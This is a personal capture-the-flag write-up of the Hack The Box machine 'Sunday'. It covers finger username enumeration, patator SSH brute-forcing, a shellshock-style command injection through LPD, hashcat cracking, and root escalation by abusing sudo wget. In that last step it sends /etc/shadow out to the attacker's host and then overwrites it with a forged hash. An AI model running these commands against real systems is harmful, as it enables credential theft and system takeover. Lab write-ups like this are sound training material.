HTB Write-up Sunday

What I learned today:

Nmap: -p- --max-retries 1 (or 0) - this speeds up the all port scan a bit.

Port 79 fingerprint service , https://en.wikipedia.org/wiki/Finger_%28protocol%29

it revealed some usernames on the service with the finger-user-enum tool.

ssh: add keyalgorithm with -okexAlgorithms=+ALGORITHM_ NAME

By using |less -s kills off line wrapping (otherwise, the output is too messy)

For ssh password cracking, use patator

sytax:

patator ssh_login host=10.129.160.144 port=22022 user=sunny password=FILE0 0=/usr/share/seclists/Passwords/  persistent=0 -x ignore:mesg='Authentication failed.' 

Wget

  • wget -i to read files

  • wget --post-file=FILE_PATH IP to upload a file to kali (nc open on 80)

Create a hash

openssl passwd -5 -salt thesalt pass123

Regular enumuration won't show the extra ports that are open which includes SSH port.

do -p- scan even though it takes forever (speed it up by doing -p- --max-retries 1 (or 0) ---> once we find weird ports, do port-specific scan like

nmap -sC -sV -p 79,111,22022,35342,56252 -oA targeted_scan IP_address 

Port 79 fingerprint service , https://en.wikipedia.org/wiki/Finger_%28protocol%29

Enumeration-

For finger enum, I used

For usernames, used /usr/share/seclists/Usernames/Names/names.txt

Syntax:

./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.129.159.222 |less -S

By using |less -s kills off line wrapping (otherwise, the output is too messy)

We got sammy and sunny

We can try to ssh into it. The password for sammy account was sunny.

When you try to login, it might give this error;

"No matching key exchange method found. Their offer : ~"

Try to add the key algorithm with "-okexAlgorithms=+ALGORITHM_ NAME"

Now we are in.

SSH Password Cracking

For ssh password cracking, use patator

sytax:

patator ssh_login host=10.129.160.144 port=22022 user=sunny password=FILE0 0=/usr/share/seclists/Passwords/  persistent=0 -x ignore:mesg='Authentication failed.' 

use a password list that's not too big or create your own password list.

515 printer

Found info about LPD here and tried it but didn't get the result - negative acknowledgement. \

oh wait...

python lpdtest.py 10.129.159.222 in '() {:;}; ping -c1 10.10.14.125'

I used the above command and it executed it...

Does that mean we can get the shell back?

--- didn't work.

Priv Esc

When looking into the files, we found a backup file.

found a shadow file.

Crack the hash with hashcat: hashcat -m 7400 hash.txt rockyou.txt

Cracked the password for summy.

Switched user to sammy with the password.

Now it's showing that the system name - SunOS 5.11 -maybe vulnerable to shellshock?

Random='() { :;}; echo nyannyannyan' bash -c:

If this worked it's possible that the system is vulnerable to shellshock

sudo -l to check if any environmental valuables are kept. 

no env valuables.

do env and just pick one to use.

Looks like it's not vulnerable this time.

When checking sammy's sudo -l,

wget is available. wget -h to see all the options we could use:

wget -i enabled us to see root files.

Create a file called "troll" with content like below.

#!/usr/bin/bash

bash

Upload it with the sammy account:

sudo wget http://10.10.14.131/troll -O /root/troll

and switch back to sunny to execute it(who has sudo access)

In this particular box, there's a task that's overwriting the file.

to prevent this,

let's have two ssh sessions open: one from the sammy (Wget to upload the file) and one from Sunny(to execute the file)

and on sammy, use

sleep5; sudo wget 10.10.14.131/troll -O /root/troll

to make the system sleep for 5 seconds, and then quickly run the file on the sammy

for some reason, I couldn't execute the /root/troll, I'm going to try another method.

Used sudo wget --post-file=/etc/shadow 10.10.14.131 to upload the shadow file to kali (nc open on 80)

Created a new file called shadow:

Create a new hash

openssl passwd -5 -salt thesalt pass123

Paste the hash to the top

Upload the shadow file to sammy account

sudo wget 10.10.14.131/shadow /etc/shadow

We can confirm that the shadow file got updated here.

With the new pass, I got in!

Last updated